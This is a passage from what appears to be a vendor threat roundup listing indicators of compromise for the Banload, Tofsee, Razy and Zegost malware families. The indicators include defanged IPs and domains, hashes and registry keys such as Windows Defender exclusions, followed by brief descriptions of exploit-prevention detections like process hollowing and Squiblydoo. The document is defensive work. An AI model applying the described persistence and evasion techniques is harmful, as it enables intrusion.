%TEMP%\191953.bat 1
%ProgramFiles(x86)%\Local Settings\Temp\msmfettg.scr 1
%TEMP%\109890.bat 1

File Hashes

183e6baad55fc5d1cf9a0fdf051f27758f6a559f0b9fdc4ebbb3cd5916ac80c0
1e69fcc7868935013fca5f9905a2f5ee8157a550eebc70082fb915ec2ab5ecd4
2d726613672d124fe1d8964166c3b718c2349d391cd27fa3702da11e26090e21
35abc38b97b188ad02d4d1a114ccdada265b93757e6625748783f3e20bb552c9
3b5be8b8de6497b81fd6e8494c2eef39d72e96e8dfce65550cfdf994150fd2b2
5056107237039768cd445645fa5c4fbdeef62273c0f334d850e7b56b471e845b
7f50400cf36c78c7aaa461a26fee646dff11296e1dd3a30cc8c9dcfae1ac2829
818610d3ac1943a0d8b49a13ea5f0f4219c1f58d0567f999501c4bb4a870b674
82221c4d4958dc5721c0396d435f509ebee4191de69ce536b9f92f96ee391692
87ae5c9e779056dae9655125198814a07e275c4364c32e758117009cbf1ffc79
88d19e4886abba58d6ff94add61bf3da9a7dfd8792f275f80f4b3e5f480850a3
91a3c2195ae9ac154eb6f9942719adcafc533c4fe3f11ba552e4c9116e3e26e9
934632c4957f01cf1203ff448436f62b428108f647a17c7281ee1c0c7e6d3944
953c6ffd2ab3a6784a59f97aebb886372e64ff111edfb2bb8e09b67e0b15fdaf
99d6c8d03aa71ce9001f92893ebce59e76856f9b11fd5a75c25ce08f7a5bada6
acb6b6bb0f3b5ce5b1cc7268bb2553af874a6bce9a82f66cfb85a751d80314be
aed83fc433ec5d72255585f2020ee0a70cdb04df09ecd9f9d82dee92d751aef7
b84ad05c9cd81079afbb1972ed88b4ca9f020278b4e1448c638dd0757ed12687
bae28f97635fbbf39fb35dc21e01f671e2b121490d7d666553374a6dd8c7b0e9
bc07064864b1ec406bf9338288f3f863234163e861bf8242f7c8d5a920c63d93
bf7747ed8100a52d9d383f4eae60e4c9070f30c79c29f43d984b72794177b22f
d19122cade0438b638e00c8729d39c32f891ae03c297422fcb2ba1073fd71b0d
e1666cb2ce50f5b40ffe93693d29dc989214a3f4edae74aedb2c1c2bd4c9a62d
eb98c161412f414ab4531fe66ae03f53d17b5c84fe47264c692df954d1d26b99
f1c7b1df8dbc874f2a2959e3fd2fbf885440b9064da65d6163d6cca36333628a

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Downloader.Banload-9861199-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
MutexesOccurrences
A7A5B4B2BE50 7
MichigamLM 4
D439348968346 4
DJ98988988 2
wwwwt 1
t0278tn29877102983 1
g3h4jhj3j 1
dssdndsdfjdfjfj 1
DJ9679676072 1
LM09298885 1
Qrweiorweiopi 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
172[.]64[.]101[.]30 4
172[.]64[.]100[.]30 2
172[.]217[.]197[.]138 1
172[.]217[.]197[.]113 1
173[.]194[.]175[.]94 1
173[.]194[.]207[.]94 1
172[.]217[.]197[.]132 1
209[.]85[.]201[.]94 1
209[.]85[.]201[.]138 1
173[.]194[.]207[.]138 1
172[.]217[.]222[.]100 1
209[.]85[.]144[.]99 1
173[.]194[.]207[.]84 1
52[.]95[.]165[.]35 1
52[.]217[.]33[.]190 1
185[.]181[.]11[.]159 1
52[.]216[.]84[.]109 1
52[.]216[.]76[.]254 1
52[.]217[.]79[.]142 1
52[.]216[.]245[.]54 1
52[.]217[.]48[.]70 1
52[.]217[.]85[.]222 1
192[.]95[.]42[.]24 1
52[.]216[.]129[.]45 1
52[.]217[.]45[.]150 1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
s3[.]amazonaws[.]com 9
www[.]sendspace[.]com 6
www[.]masterpublicidade[.]com 3
sites[.]google[.]com 1
s3-sa-east-1[.]amazonaws[.]com 1
www[.]cabanadosol[.]net 1
brasilcargas[.]space 1
Files and or directories createdOccurrences
\ID.Dat 11
%ProgramFiles%\XCV5NQ6T5\ZS3423.467 4
%ProgramFiles(x86)%\XCV5NQ6T5 4
%ProgramFiles(x86)%\XCV5NQ6T5\ZS3423.467 4
%ProgramFiles(x86)%\Cllbs 4
%ProgramFiles(x86)%\IUjlcmbvbhxjuisvsheimgvhmdwhuzmx 3
%ProgramFiles(x86)%\AlphabeticManager 2
%ProgramFiles%\NJNQ6T5\657w5.5474 1
\do 1
\zoomed 1
%ProgramFiles(x86)%\NJNQ6T5 1
%ProgramFiles(x86)%\NJNQ6T5\657w5.5474 1
\grinders 1
%ProgramFiles(x86)%\IUjlcmbvbhxjuisvsheimgvhmdwhuzmx\0439034906.467 1
\ld 1
\aldvids 1
%ProgramFiles(x86)%\ZIUjlcmbvbhxjuisvsheimgvhmdwhuzmx 1
\algelon 1
%ProgramFiles(x86)%\soapv2 1
\pnTemp 1
%ProgramFiles(x86)%\PITUjlcmbvbhxjuisvsheimgvhmdwhuzmx 1
%ProgramFiles%\IUjlcmbvbhxjuisvsheimgvhmdwhuzmx\0439034906.467 1

File Hashes

166554cb48b210b46af9dac9741da40904c7827696eeaa36ea2cd2d05b57b964
17bb43e9e6aff6d5cfedbce550252bcf4ad85241915f47674688acbe8f7274f3
1bc49fbaf79dd64dfa1444ef14942cfa09d3a908bd743490394cdf515306cdd1
221dd201de219cb0ad766e55fac3270660f138bfc1c1b79044cdfd7fb57e2f2f
2c0e371df8026e3c58b45270a0b4034b4b7d3ea2a59d7bfa4ba27d104473a82a
41e8a032e17fa6680bd44ac5ce4e056380787103007f26405474bc9ea11023b0
460aa14b4ca77d7cdd464b07e7a06e6793c96576a22cee1e2048e8036a050b8d
55b9683748287549ed5e4af1e53a5eda957e230194febcae5ef9be04fcbaebff
5fa8bb092e9f454fc712fbd294e5911ee815258494698ae0c295eac3e9c9d565
656f59dfb57595ba84395ce632a0f0f11e19f5b0f7f73e97c0886c577d87aa7a
68ce5ea5e7f7ed94e7cfcb27ef56017541aac2b8f36160896de9cb6045c9689f
74cdc056e46b193f9e8addb360bfaaeffac251c454d6117126d571f58990bef7
76a348c168c543e7c16099dbe86e942241de5daec83a59736717e60df84c9c9b
7abffe049c5c079319df8e85aaa8430fe08f629d52e34bf9a4d1d4defa6cfeca
7c52a6d15f4df7dfabfbd864444cb91e710e6b3662f23c8718df1be3b9114a5f
8b1cd6d6181b837983fde17d7e3ee06e7bb4d610942dc245d905ad9af84032d3
8e52d6d10c5c06ff2cd43ab5d0ee884eaa6a32787552f3bc3324470aae05c2cf
907e7d151bf71dc982d08b3dbe15c9fe602c02957058eddebe039bcea1b072b3
91d3f095047326e4bf99208fe11cdb0a88701f178ab98ae89c49e818a084c386
9b784fc190b973bd14b906402191c672a5e0a4eb202a04482cfe06b6353584bf
9bd81f44138f38c7b175dab2bdaad7cc7498a9e457f87f744f39cd2c040592c0
9e001e4c61965ec1e2a3c36c1c3fa744d4e10ef08ce6549c3983be80c3b0c853
9e4add8d639fce7a965aa4f845d0847b63358632c16ad41d919cbc53ecd752d0
c1f69f578496c2ef4b4f46fb3b9a77537a75dc9b147a561b4eab3389e04c5e0c
c72e274038f91b7375147ee0c63b290a369d7c4a82fadeb891e7c60b7bc9c19e

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Tofsee-9861724-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 33 samples
Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
18
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 18
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
18
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
18
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\zsgmltzo
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\rkyedlrg
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\xqekjrxm
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\ohvbaiod
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\unbhgouj
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\ibpvucix
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\haoutbhw
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\exlrqyet
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\nguazhnc
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\athnmuap
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\jcqwvdjy
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\piwcbjpe
1
MutexesOccurrences
Global\<random guid> 7
YMyooCcSkKSRdwHNrGke 2
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
43[.]231[.]4[.]7 18
217[.]172[.]179[.]54 18
144[.]76[.]108[.]82 18
212[.]22[.]87[.]191 18
51[.]178[.]207[.]67 18
195[.]242[.]110[.]99 18
87[.]251[.]71[.]150 18
91[.]203[.]5[.]144 18
157[.]240[.]18[.]174 12
37[.]1[.]217[.]172 11
104[.]47[.]17[.]161 10
40[.]76[.]4[.]15 9
172[.]217[.]10[.]228 9
216[.]239[.]36[.]126 9
211[.]231[.]108[.]176 8
195[.]186[.]120[.]50 6
172[.]217[.]10[.]35 6
104[.]47[.]53[.]36 6
31[.]13[.]65[.]174 6
211[.]231[.]108[.]174/31 6
172[.]217[.]12[.]132 5
40[.]112[.]72[.]205 5
172[.]217[.]10[.]67 5
104[.]47[.]54[.]36 5
188[.]125[.]72[.]74 5

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 18
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 18
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 18
249[.]5[.]55[.]69[.]in-addr[.]arpa 18
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 18
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 18
microsoft-com[.]mail[.]protection[.]outlook[.]com 18
microsoft[.]com 18
www[.]google[.]com 18
www[.]instagram[.]com 18
178[.]79[.]134[.]18[.]in-addr[.]arpa 12
work[.]a-poster[.]info 11
234[.]172[.]168[.]18[.]in-addr[.]arpa 11
app[.]snapchat[.]com 9
i[.]instagram[.]com 6
smtp[.]gmail[.]com 6
ip[.]pr-cy[.]hacklix[.]com 5
www[.]google[.]co[.]uk 5
www[.]google[.]ru 5
www[.]bing[.]com 4
www[.]amazon[.]com 4
www[.]google[.]es 4
www[.]google[.]de 4
accounts[.]snapchat[.]com 4
yabs[.]yandex[.]ru 4

*See JSON for more IOCs

Files and or directories createdOccurrences
%TEMP%\<random, matching '[a-z]{8}'>.exe 20
%SystemRoot%\SysWOW64\config\systemprofile 18
%SystemRoot%\SysWOW64\config\systemprofile:.repos 18
\Device\ConDrv 18
%System32%\config\systemprofile:.repos 18
%System32%\<random, matching '[a-z]{7,8}'>\<random, matching '[a-z]{6,8}'>.exe (copy) 18
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 17
%TEMP%\CC4F.tmp 7
%APPDATA%\Microsoft\Network 2
%APPDATA%\Microsoft\Network\sqlcmd.exe 2
%System32%\Tasks\Azure-Update-Task 2
%APPDATA%\nailedp 2
%APPDATA%\nailedp\edspolishpp.exe 2
%TEMP%\ikflerb.exe 1
%TEMP%\egbhanx.exe 1
%TEMP%\tmpE816.tmp 1
%TEMP%\tmpE846.tmp 1
%TEMP%\tmp24F5.tmp 1
%TEMP%\tmp2534.tmp 1

File Hashes

09ae36bd8a99a07a468de01fd51717248d609e517fa0e1758fb897f7bfdbbb89
0a975b70dd4adf5da3589ade4ea0f3ea8dd801600a5cc25299d2b0d7205a87ee
0c504f87300b37f483fbb0cab9ff19ef519c37bb8408698e42c99edbed131957
1e1732bc1e9c209f167975c47394dcb27f568127198d4169308edad26c8b341b
4ae9131fdcbfb556a543ff7813eea547f3e3c219c925bdd2d3c3f30b18b0a59d
57a090de584e7f3571d5018290b1a7240a50b88702066dc0735194697b622c85
6185c1c3eac92a93655dd1625046e208b78560f830f0da382cd646dc0b480f0b
74e1b228a8aa59432f14422298b718a6f22bdba103aa91243c2d34328fdd0711
7cb6e93ef4c1b4cd911541a0bc7a3b6ab56bf0a32ae374e53403483a7df881e6
8891dca3d1626fbb5b806236d0ff6533a4cc433525819370943963d37cbaa083
8aa1c07932e27107b5d437ca71a5a200c7127a593e3f932ac55d9868ac912d30
8e4a75bcedfe2f421fc0c0b4a2fa47ab0a66717ed00ac72478316371f10fafbe
8fd1e58dc6fbec751e509d5b74e7726212d88bb5b052b61568e5d10981eb2adb
929c29a61a42deedb9110544506ae6b693be8cad213cfd0970afe1f38e0dfb4f
963667b8be1e201bfbeed43105fa41cee375238b535a20024c0f5dd86eef6368
a56b085facad013e87cd62a2ee01745d76b6e78980e3c6ab8f4b10b2cbd43737
a886673cc7343c33bb399811c8eeeb6ddfb6d48d80ca5fb4926385ebe78e609a
ac2ff12c04dabdb05369d3583c6952ba821cb61fcb43525c31bd4dd51bab7079
ae4f86485e4cdbb8acef9f82a61d3d50bc0a41d40524d71b62a814c622584602
b3de4c58df8c320a1ecf32827bfec6d5269f36b2481268a5c129dea570ad68ad
b4b43fca30cb44c5eaeb2912505c57cd57359a88b3014265c47cc220ec2151d1
baa14187d765caf6d916ad5c66eadc1e40c4b1feee17f254055903bf6345889e
c1389d73d4d59e56dd8dc11cc44dd84b71c209f08c7a19b5f8250b8b8f887748
c1e6a446743d8a978286f8feceeb77534986fb323d15ec38db4adc9883eecf1e
c5a6c7ea2355a4066ed286193605da6428885be49af33ec5c9941b1928ee0bb2

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Razy-9862528-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
MutexesOccurrences
<random, matching [A-Z0-9]{10}> 25
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
172[.]217[.]165[.]142 23
104[.]21[.]73[.]114 15
104[.]21[.]62[.]78 12
172[.]67[.]144[.]180 11
172[.]217[.]197[.]100/31 11
172[.]67[.]221[.]206 11
172[.]217[.]197[.]138/31 7
172[.]217[.]197[.]113 6
72[.]21[.]81[.]240 2
172[.]217[.]197[.]102 2
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
w[.]google[.]com 23
zipansion[.]com 23
onizatop[.]net 23
www3[.]l[.]google[.]com 13
cs11[.]wpc[.]v0cdn[.]net 2
www[.]by98xktkc4[.]com 1
www[.]oftbbynmm2[.]com 1
www[.]jnruvlpyvp[.]com 1
www[.]v3n23wnem3[.]com 1
www[.]9aducqoo3l[.]com 1
www[.]adeh5zdts5[.]com 1
www[.]xf9mdttwus[.]com 1
www[.]x0uyd3y3hf[.]com 1
www[.]7tjc6jgdbm[.]com 1
www[.]pzmzhlrzot[.]com 1
www[.]ip2f4apqye[.]com 1
www[.]csijgwdmuf[.]com 1
www[.]jjmhhs7srl[.]com 1
www[.]g3dhjzqraw[.]com 1
www[.]6xdnikw9rz[.]com 1
www[.]dn7oli0kxm[.]com 1
www[.]e9vyqxeqxs[.]com 1
www[.]yjwrlcofbp[.]com 1
www[.]ozpxm05ysd[.]com 1
www[.]w2ovgvjolp[.]com 1

*See JSON for more IOCs

Files and or directories createdOccurrences
%System32%\Tasks\Google_Trk_Updater 23
<malware cwd>\old_<malware exe name> (copy) 23
\old_runme.exe (copy) 2

File Hashes

08e45dadfee87722e35c210cac597d1283d78f8213910cfd270fd81d96bf0633
0e824c7201f3c9f990bf9f6769cea66fdb1064bda58a7c480e92010e04e80c8c
10849cc800a317eaf0e1637cf72d114fd55201d59ccb814c6e7eaecc158db15c
1c55ee6f80c93acbf3935b9ef0b1fbab067651e789e2bc55d895ad9b67c52556
214231fe5124d373d2939636229d90f7753af4e7c540358778e3d5f37fec81d6
400452a32f68a59bfb48bbc7f7117a61190cd942b5da0dcb3d389a6a19b2c619
4071fec1bdbdb10455ec954ac56a5e8bae135d823b1cacd39a72cc40f18127ec
52cc78e8b57132f3b3d2512965d6dcb8172939ff6f8ce2263f096ca6b60bc3a1
58ae1908c42a918d6524d8296a8ce58fbfd4f81ceebc7a0c0a8cd7abe55371f4
74a30057c8929985032462699135d6499b954c3c5692dd92dd1c899312de4ca5
75415a2a6751bd262fc54df3d2cb8db9cf50ec9cb245dfde63eca621e72e0567
7c182b3a25791da52dbf96651402bc1fb87397dd7b8d37d0269cf268f1f0736c
8013ee650fc47bf0394f0b615aff85e0bb92760995fcec778a7304f52b143b7b
823ea7af1336e813668459b07793a7028ec0c6508e2d32432026de24f113f932
86f5f6b5bf8791003e0cbf1dc02666ba1b549697f0b24a1ddbbe1629d7b485f7
8e8df2f176ca110d40a74fb83ea02c0cb3a27885d9500270efcc4e74b569e3fa
90a350f3de768de91789ab85c229960a8175f6b83d214443e8fe216cf55037dd
aa2cac5a337aa0c4bf0b63bcf4d1525861504bbbeaf819abf7f8d8973f63a14b
aa5ff8a172e621d2d780186d3a22deecabb2e00c6792df2050cfa863cae784ea
bb28437022cc3f7748419bf5331236647389794f7d7e05ef7a9fcfffbffb6e07
c98f7368ef5d0d34a4bae35eb3086d26dee27e0b0f689830e4c77bfc51309c64
d03bc54820e69472080aaea6a6145dba730010ba504316431ba4a618ed0bd0b0
d86e0b0b048036b8554527b5928926320289b7b102e44793ef4281ea9f4f040d
e565ae19805664006140c3fb7e30d8e6c102eea6f67c6d123c9f5c3b8f910d37
eaefe82f01ed1d3abb01625105030e8e65ad61cdf20365a403292851062752cd

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Malware.Zegost-9861320-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 13 samples
Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL
Value Name: Start
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL
Value Name: ErrorControl
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL
Value Name: DisplayName
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL
Value Name: WOW64
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL
Value Name: ObjectName
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL
Value Name: Description
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL
Value Name: Type
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY
Value Name: Type
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY
Value Name: Start
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY
Value Name: ErrorControl
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY
Value Name: ImagePath
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY
Value Name: DisplayName
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY
Value Name: WOW64
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY
Value Name: ObjectName
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY 3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY
Value Name: MarkTime
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\QRSKLM FGHXY
Value Name: Description
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL
Value Name: ImagePath
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SKCSKB TLCTL
Value Name: MarkTime
3
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEUMEB TLCTH
Value Name: MarkTime
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MEUMEB TLCTH
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PHXPHX QIYQH0
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PHXPHX QIYQH0
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\PHXPHX QIYQH0
Value Name: ErrorControl
1
MutexesOccurrences
Global\<random guid> 12
<original file dir>\<original file name>.exe 12
C:\Program Files \(x86\)\Google\<random, matching '[A-Z][a-z]{4}'>.exe 12
CdD3CQQF99D3DRCm 4
CtD3CQQF99D3DRCm 3
B/n+DQUP8wkQ0Aizs7S00BAJ+qY= 2
9/f30BED/g4LDND6D/am 1
EQO30P79/KY= 1
+PbztNARA/4OCwzQ+g/2pg== 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
58[.]250[.]136[.]113 12
142[.]252[.]249[.]202 2
107[.]182[.]21[.]225 2
103[.]231[.]166[.]93 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
users[.]qzone[.]qq[.]com 12
e[.]webaw[.]win 4
d[.]webaw[.]win 3
guxiaosen[.]f3322[.]net 2
_____ 2
www[.]mcxhkj[.]top 1
vps2[.]mcxhkj[.]top 1
mc7[.]xyz 1
'00 1
Files and or directories createdOccurrences
%ProgramFiles%\<random, matching '[a-z]{5,9}\[a-z]{3,9}'>.exe 13
%ProgramFiles(x86)%\Google 12
%ProgramFiles\(x86\)%\Google\<random, matching '[A-Z][a-z]{4}'>.exe 12

File Hashes

08e8eb7f6ce4dc28bbd082c822c946e1e12e2b39586f99301b0a602ba7d97aae
41982ff01fec17c5aa0c84f1d4d0a5edd25e24f0a5392ebb4679c3e7f91544c0
5a6df557ed0e75eace633ba364ce6f8777007e9331f0b2d0b259299eee7bc8c0
65d85707e1d5cb667a9dc37c2fde53a20502994568bd3b8e4dbe44710d5ecc3f
9127f822308fd03e193fd0251a40a18ee36d7bb95e9496f2c0d0a19c33988129
a3ef1bb8de5f047e23a494f11038027730cbf6213b739b004f583afbdb155e24
b7a277b375b61ec0d0b7ca5866c00afdd64e645e417c4ec39d811fbdd6d424dd
d4feda997cb52984edbf7d820a4a66278935b46ca89c8aec27f3548504f055e6
d62676a6a793a556dff8e8d8cd9b156580f155f91b3663248c48437d68d1b83e
e46e889f3f50004a01dc9d5b86c173fc0f69e24c9050f45b5ef68787ea3237b0
e49abcd66f4cbd8d96c04389f194d99c26e16d0981a6ebe4bc671a149a2505ac
f43bfe06c9ad1e4fd93223eb0800cb6e4537209cb4d13de3afecb46b91baf232
f851bfc8f605f2fe478303e7f188a71400d7997ae231e8bd9ba0a0c014420e8c

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (11610)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Excessively long PowerShell command detected - (6207)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Reverse tcp payload detected - (2703)
An exploit payload intended to connect back to an attacker controlled host using tcp has been detected.
Crystalbit-Apple DLL double hijack detected - (1176)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a dll double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and in some cases spyware deployment.
Squiblydoo application whitelist bypass attempt detected. - (925)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker controlled server.
A Microsoft Office process has started a windows utility. - (632)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many malware different malware campaigns and families.
Kovter injection detected - (625)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Trickbot malware detected - (333)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Dealply adware detected - (264)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Cobalt Strike activity detected - (184)
Cobalt Strike is a tool used by both penetration testers and malicious actors. It has been observed being used to deliver Ryuk ransomware and other payloads.